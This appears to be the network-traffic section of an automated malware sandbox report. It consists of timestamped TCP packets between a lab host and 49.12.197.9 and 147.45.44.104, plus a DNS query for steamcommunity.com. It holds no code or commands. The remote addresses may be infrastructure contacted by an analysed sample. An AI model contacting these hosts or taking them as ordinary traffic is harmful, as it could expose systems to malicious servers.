                                                                                                                                                                            Oct 3, 2024 03:27:13.026801109 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.027409077 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.027409077 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.032876015 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.032900095 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.034061909 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.034070015 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.035393000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054102898 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054148912 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054230928 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054239035 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054256916 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054284096 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054306984 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054361105 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054361105 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054371119 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054387093 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.054482937 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.061981916 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.062036037 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.062079906 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.062086105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.062191963 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.062191963 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114548922 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114614010 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114777088 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114777088 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114784956 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114892960 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.114965916 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115010977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115058899 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115065098 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115168095 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115219116 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115245104 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115246058 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115246058 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115255117 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115346909 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115411997 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115411997 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115432978 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115436077 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115484953 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115556955 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115556955 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115566015 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.115744114 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121530056 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121576071 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121673107 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121685982 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121696949 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.121732950 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142503977 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142554045 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142864943 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.142873049 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.143110037 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152302027 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152344942 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152394056 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152400970 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152520895 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.152520895 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.191936016 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192020893 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192044973 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192061901 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192100048 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.192574978 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203205109 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203260899 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203321934 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203389883 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203399897 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203450918 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203493118 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203784943 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203829050 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203861952 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203876972 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203917027 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.203933001 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204339027 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204381943 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204457998 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204457998 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204466105 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204580069 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204649925 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204694033 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204725981 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204731941 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204796076 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.204796076 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210175037 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210222960 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210279942 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210279942 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210287094 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.210982084 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231364012 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231429100 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231453896 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231461048 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231523991 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.231524944 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241272926 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241319895 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241368055 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241374969 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241420984 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.241420984 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280518055 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280544043 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280599117 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280606985 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280653000 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.280668020 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.291863918 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.291897058 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292037010 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292045116 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292236090 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292474985 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292495966 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292582035 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292582035 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292587996 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.292819977 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293046951 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293097019 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293158054 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293173075 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293173075 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293231964 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293523073 CEST49727443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.293535948 CEST4434972749.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995215893 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995268106 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995361090 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995693922 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:13.995707035 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.650401115 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.650634050 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.651221037 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.651236057 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.652820110 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.652827978 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.652848959 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:14.652859926 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.325474024 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.325593948 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.325695038 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.325948000 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.325973988 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626007080 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626096010 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626147985 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626177073 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626218081 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.626249075 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.627643108 CEST49729443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:15.627672911 CEST4434972949.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.347665071 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.347760916 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.348413944 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.348421097 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.350209951 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:16.350219965 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045301914 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045348883 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045397997 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045423985 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045437098 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045464993 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045488119 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045537949 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045794010 CEST49730443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.045805931 CEST4434973049.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.049251080 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.049283981 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.049650908 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.049650908 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.049679995 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.744916916 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.745181084 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.745675087 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.745682955 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.747536898 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:17.747543097 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491447926 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491511106 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491584063 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491611004 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491664886 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491749048 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491749048 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491749048 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491863966 CEST49731443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.491879940 CEST4434973149.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.517452955 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.517477989 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.517571926 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.517828941 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:18.517848015 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.570615053 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.571326017 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.571326017 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.571338892 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.573359966 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:19.573367119 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302256107 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302378893 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302391052 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302439928 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302546024 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.302546024 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.303339958 CEST49732443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.303350925 CEST4434973249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.587361097 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.587430954 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.587542057 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.587848902 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:20.587865114 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.565752983 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.565876961 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.566440105 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.566472054 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568227053 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568242073 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568361044 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568397999 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568413019 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568432093 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568531990 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568573952 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568593025 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568607092 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568753958 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568790913 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568813086 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568861008 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.568994999 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.569027901 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.569055080 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.569081068 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.569097042 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:21.569111109 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.155564070 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.155689955 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.155713081 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.155802965 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.156016111 CEST49733443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.156059980 CEST4434973349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.196877003 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.196974993 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.197079897 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.197289944 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.197316885 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.962637901 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.962749004 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.965739012 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.965797901 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.968151093 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:23.968169928 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:24.985470057 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:24.985579967 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:24.985610962 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:24.985655069 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.031533003 CEST49734443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.031579971 CEST4434973449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.083116055 CEST4973580192.168.2.9147.45.44.104
                                                                                                                                                                            Oct 3, 2024 03:27:25.089647055 CEST8049735147.45.44.104192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.089709044 CEST4973580192.168.2.9147.45.44.104
                                                                                                                                                                            Oct 3, 2024 03:27:25.089828014 CEST4973580192.168.2.9147.45.44.104
                                                                                                                                                                            Oct 3, 2024 03:27:25.096107960 CEST8049735147.45.44.104192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.798827887 CEST8049735147.45.44.104192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:25.798986912 CEST4973580192.168.2.9147.45.44.104

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Oct 3, 2024 03:26:42.385562897 CEST5649253192.168.2.91.1.1.1
                                                                                                                                                                            Oct 3, 2024 03:26:42.392971039 CEST53564921.1.1.1192.168.2.9

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Oct 3, 2024 03:26:42.385562897 CEST192.168.2.91.1.1.10x5425Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                            DNS Answers

